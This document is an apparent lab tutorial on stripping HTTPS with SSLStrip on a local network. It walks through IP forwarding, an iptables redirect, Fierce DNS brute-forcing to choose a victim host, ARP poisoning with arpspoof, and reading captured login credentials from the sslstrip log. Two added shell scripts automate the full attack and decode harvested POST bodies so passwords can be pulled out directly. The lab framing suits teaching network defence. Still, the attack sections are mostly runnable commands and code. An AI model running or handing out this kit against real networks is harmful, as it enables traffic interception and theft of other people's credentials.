Attack Vector 2 – SSLStrip

A successful attack on SSL encryption requires tools other than Wireshark.  One such tool is SSLStrip.  Rather than breaking the encryption, SSLStrip sits between the victim and the server as a transparent HTTP proxy: it watches the victim's plain HTTP traffic, rewrites every https:// link and redirect it sees into http://, and then makes the HTTPS connection to the real server itself.  The victim's browser only ever speaks unencrypted HTTP to the attacker, so it never shows a certificate warning, while the server still sees a normal TLS session.  Two caveats follow from this design.  The victim has to start from a plain HTTP request (a typed hostname, a bookmark, or a link without https://), because SSLStrip cannot see inside a TLS session that is already established.  And a site whose HSTS header the browser has already cached, or that is on the browser's HSTS preload list, will not be downgraded, because the browser refuses to send plain HTTP to it at all.

[Image: SSLStrip_1]

A Normal SSL Connection

The image above shows a normal secure connection to a web server.  Data passes directly between the user's browser and the server over a TLS-protected channel, so an observer on the network sees only ciphertext and the user is relatively safe.

[Image: SSLStrip_2]

A SSL Connection Intercepted by SSLStrip

In this scenario the attacker first becomes a MitM, and SSLStrip then replaces the secure requests to the server with unsecured requests on the victim's side of the connection.  Everything the victim submits, credentials included, crosses the local network in plain text and can be read straight out of the attacker's log.

The best way to learn a new program is to read its help output.  SSLStrip prints its help with the following command:

root@kali:~# sslstrip -h

[Image: SSLStrip-Help]


SSLStrip Attack Process

The following sections cover each part of the attack, in the order you would carry it out.  A commands-only summary appears at the end of the page.


IP Forwarding

IP forwarding tells the Linux kernel to pass packets that are not addressed to it on to their proper destination.  It must be enabled before we start ARP cache poisoning: once we have inserted ourselves as a MitM, every packet the target sends to the gateway (and every reply coming back) arrives at the Raspberry Pi first, and forwarding is what sends it on.  Without it we simply black-hole the target's traffic and create a denial of service (DoS) instead of an interception.

Step 1: Setup IP forwarding

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Check that the setting took effect; the file should now read 1:

root@kali:~# cat /proc/sys/net/ipv4/ip_forward

[Image: IPForward]

IP Routing

Step 2: Redirect forwarded traffic destined for TCP port 80 to local port 8080.  Because the rule sits in the nat table's PREROUTING chain, it catches the target's HTTP requests as they arrive at the Raspberry Pi and hands them to the port SSLStrip will listen on, instead of forwarding them straight to the web server.  Traffic on port 443 is deliberately not redirected: once a browser has opened a TLS session there is nothing SSLStrip can do with it, which is why the attack depends on the victim's first request being plain HTTP.

root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Find Default Gateway

Step 3: Discover your current default gateway (on newer systems without net-tools, ip route show default gives the same answer)

root@kali:~# netstat -nr

[Image: DefaultGateway]


Locate Target IP

There are several ways to discover the IP address of your target system: network enumeration, DNS enumeration, Active Directory fingerprinting, and social engineering, to name a few.  Since the Raspberry Pi is already on the target's network we can run commands that return useful information directly.  One option is a full scan of the entire network.  Although informative, a scan is noisy and may give away the Raspberry Pi, and we want to keep our access quiet.

Another option is to check whether the target network's DNS servers allow zone transfers.  Over the years, however, most networks have been hardened against that.  That said, a DNS server will by design answer any query it knows the answer to.  This is an inherent weakness; the trick is knowing what to ask.  Brute-forcing likely hostnames gets around the lack of a zone transfer.

Fierce queries a target domain's DNS server for a list of likely fully qualified domain names and reports which ones resolve, together with their IP addresses.  It ships with a wordlist of 2,280 common hostnames that it tries by default.  The following names have been added to my ISP's DNS; let us see how many Fierce's default list catches.

development.bahansen.info
frontdesk.bahansen.info
accounting.bahansen.info
ceolaptop.bahansen.info
workstation1.bahansen.info
workstation2.bahansen.info

Step 4: Locate target IP address

root@kali:~# fierce -dns bahansen.info

[Image: Fierce]
Fierce found three of the six entries above, plus several default entries created by my hosting provider for essential services.

In my opinion the most enticing entry listed above is accounting.bahansen.info, which resolves to 192.168.2.87, so we will move forward with an attack on the Accounting workstation.  With the target address and the default gateway known, we can execute the attack.

MitM with ARPSpoof

ARPSpoof sends a continuous stream of forged ARP replies.  With the options below it tells the Accounting workstation that the Raspberry Pi's MAC address belongs to the gateway and, because of -r, tells the gateway that the Raspberry Pi's MAC address belongs to the Accounting workstation.  Both sides then send their traffic for each other to Kali Linux, where we intercept it, and the IP forwarding enabled in Step 1 relays those packets on to their real destination in both directions.

The syntax for ARPSpoof is: arpspoof -i <interface> -t <target IP> -r <gateway IP>

Step 5: Issue the ARP cache poisoning command using ARPSpoof

root@kali:~# arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1

This command occupies the current terminal and must keep running for the whole attack; when it is stopped with Ctrl + C it sends corrective ARP replies to undo the poisoning.  Leave ARPSpoof running and open a second connection to the Raspberry Pi to issue the remaining commands.

Running SSLStrip

SSLStrip is a simple command line program that attempts to replace secure encrypted web pages with their plain-text equivalent.

Step 6: Open a new SSH session to the Raspberry Pi

root@kali:~# ssh 192.168.11.15


Step 7: Start SSLStrip listening on port 8080, the port the iptables rule in Step 2 redirects HTTP traffic to.  By default it writes the requests it captures to sslstrip.log in the current directory.

root@kali:~# sslstrip -l 8080

On the target computer open a browser, browse to www.facebook.com by typing the hostname (so that the first request goes out as plain HTTP), and log in with a test account.  A browser that has already cached an HSTS policy for the site, or ships it in its preload list, will go straight to HTTPS and the downgrade will not happen; in a lab, pick a test site that does not send HSTS.

Step 8: Stop SSLStrip

Ctrl + C
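Steps 1 through 7 leave the target cut off from the network if the Raspberry Pi is unplugged or the session drops before ARPSpoof is stopped cleanly. The script below is an added example, not code from the original page: it wraps the same commands in a single script whose exit trap stops arpspoof (which then re-ARPs the victim and the gateway), removes the iptables redirect, and restores ip_forward to its previous value. It also turns Step 3 into a parser that reads routing-table text on standard input, so the gateway lookup can be exercised against a constructed netstat sample without touching the live table. The interface name eth0, the use of --run as the trigger, and the assumption that arpspoof and sslstrip are on PATH are mine, not the page's.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): Steps 1, 2, 3, 5 and 7 in one
# script, with the teardown the page leaves to the reader. Stopping sslstrip
# with Ctrl + C runs cleanup(), which stops arpspoof (it re-ARPs on exit),
# deletes the redirect rule and puts ip_forward back the way it was.
# Assumptions (mine): interface eth0 unless IFACE is set, arpspoof and
# sslstrip on PATH, and the script run as root with "--run <target> [gateway]".

IFACE="${IFACE:-eth0}"
REDIRECT_PORT="${REDIRECT_PORT:-8080}"
LOGFILE="${LOGFILE:-sslstrip.log}"
FORWARD_FILE=/proc/sys/net/ipv4/ip_forward

# Constructed sample of `netstat -nr` output, used only to exercise the parser.
SAMPLE_NETSTAT='Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         192.168.2.1     0.0.0.0         UG        0 0          0 eth0
192.168.2.0     0.0.0.0         255.255.255.0   U         0 0          0 eth0'

# Step 3: read routing-table text on stdin and print the default gateway.
# Understands the `netstat -nr` layout ("0.0.0.0 GW ...") and the `ip route`
# layout ("default via GW dev IF"). Returns 1 if no default route is present.
parse_default_gateway() {
    while read -r dst gw rest; do
        case "$dst" in
            0.0.0.0) printf '%s\n' "$gw"; return 0 ;;
            default) printf '%s\n' "${rest%% *}"; return 0 ;;
        esac
    done
    return 1
}

forwarding_enabled() { [ "$(cat "$FORWARD_FILE")" = 1 ]; }

cleanup() {
    trap - EXIT INT TERM      # run once, not again from the EXIT trap
    # Order matters: stop the poisoning first so arpspoof can send its corrective
    # ARP replies while forwarding is still on, then drop the redirect, then put
    # ip_forward back to whatever it was before we started.
    if [ -n "${ARP_PID:-}" ]; then
        kill -TERM "$ARP_PID" 2>/dev/null
        wait "$ARP_PID" 2>/dev/null
    fi
    iptables -t nat -D PREROUTING -p tcp --destination-port 80 \
        -j REDIRECT --to-port "$REDIRECT_PORT" 2>/dev/null
    printf '%s\n' "$ORIG_FORWARD" > "$FORWARD_FILE"
}

run_attack() {   # usage: run_attack <target IP> <gateway IP>
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    ORIG_FORWARD="$(cat "$FORWARD_FILE")"
    trap cleanup EXIT INT TERM
    echo 1 > "$FORWARD_FILE"                                        # Step 1
    forwarding_enabled || { echo "ip_forward did not take" >&2; return 1; }
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 \
        -j REDIRECT --to-port "$REDIRECT_PORT"                        # Step 2
    arpspoof -i "$IFACE" -t "$1" -r "$2" >/dev/null 2>&1 &             # Step 5
    ARP_PID=$!
    sslstrip -l "$REDIRECT_PORT" -w "$LOGFILE"                        # Step 7, foreground
}

if [ "${1:-}" = "--run" ]; then
    [ -n "${2:-}" ] || { echo "usage: $0 --run <target IP> [gateway IP]" >&2; exit 1; }
    gateway="${3:-$(netstat -nr | parse_default_gateway)}"            # Step 3 if not given
    run_attack "$2" "$gateway"
fi
```

Run it as root with `./sslstrip-mitm.sh --run 192.168.2.87` (the gateway is read from the routing table when the third argument is omitted) and stop it with Ctrl + C; the log lands in sslstrip.log as in Step 9. arpspoof is sent SIGTERM rather than SIGINT because a background job started from a script may have SIGINT ignored, and arpspoof handles both signals the same way.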


Step 9: Review the captured data

root@kali:~# more sslstrip.log

[Image: SSLStrip_Log]

In the captured POST body, "%40" is the URL encoding of "@" and "%21" is the URL encoding of "!"; after decoding you get:

User Name: bahansen.us@outlook.com
Password: SecurityRocks!
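Reading credentials out of a long sslstrip.log by hand gets tedious once more than one form has been captured, and the percent-encoding above is only the simplest case. The following added example (mine, not the page's) does the decoding in the same shell the rest of the page uses: it pairs each "POST Data (host):" line with the body line that follows it, splits the body on "&", and percent-decodes every value with a small awk routine, so "%40" and "%21" come back as "@" and "!" exactly as in the manual decode above. The sample log embedded in the script is constructed for this example; its layout follows the header-then-body lines sslstrip writes, but the timestamps, hosts and field names are invented.

```shell
#!/usr/bin/env bash
# Added example, not code from the original page: decode the POST bodies that
# sslstrip writes to its log. The sample log is constructed; its layout follows
# sslstrip's "POST Data (host):" header line followed by the body line, but the
# timestamps, hosts and form fields are invented for this example.

SAMPLE_LOG='2014-03-01 10:22:17,401 SECURE POST Data (www.facebook.com):
lsd=AVr3k1&email=bahansen.us%40outlook.com&pass=SecurityRocks%21&persistent=0
2014-03-01 10:23:05,118 POST Data (intranet.bahansen.info):
user=ceo&pw=p%40ss+word%26more'

# Percent-decode one string: "+" becomes a space and each %XX becomes byte XX.
# Done in awk so it works under plain sh, where printf has no \x escapes.
urldecode() {
    printf '%s\n' "$1" | awk '
    function hexval(h,  v, i) {
        v = 0
        for (i = 1; i <= length(h); i++)
            v = v * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
        return v
    }
    {
        gsub(/\+/, " ")
        out = ""
        while (match($0, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
            out = out substr($0, 1, RSTART - 1) sprintf("%c", hexval(substr($0, RSTART + 1, 2)))
            $0 = substr($0, RSTART + RLENGTH)
        }
        print out $0
    }'
}

# Read an sslstrip log on stdin and print "host field=value" for every field
# of every POST body, with the value decoded.
decode_post_data() {
    local host="" line field
    while IFS= read -r line; do
        case "$line" in
            *"POST Data ("*"):")
                host="${line#*"POST Data ("}"; host="${host%"):"}" ;;
            *=*)
                [ -n "$host" ] || continue
                printf '%s\n' "$line" | tr '&' '\n' | while IFS= read -r field; do
                    printf '%s %s=%s\n' "$host" "${field%%=*}" "$(urldecode "${field#*=}")"
                done ;;
        esac
    done
}

# Convenience: pull one decoded field for one host from a log on stdin.
field_value() {   # usage: field_value <host> <field>  < sslstrip.log
    decode_post_data | sed -n "s/^$1 $2=//p"
}

# Stand-alone run: decode the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | decode_post_data
```

Against a real capture, `decode_post_data < sslstrip.log` lists every submitted field, and `field_value www.facebook.com pass < sslstrip.log` prints just the decoded password. The decoding handles any %XX escape and "+" for space, so it covers passwords with characters the page's two examples do not show.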


Commands Only


echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
netstat -nr
fierce -dns bahansen.info
arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1
sslstrip -l 8080
more sslstrip.log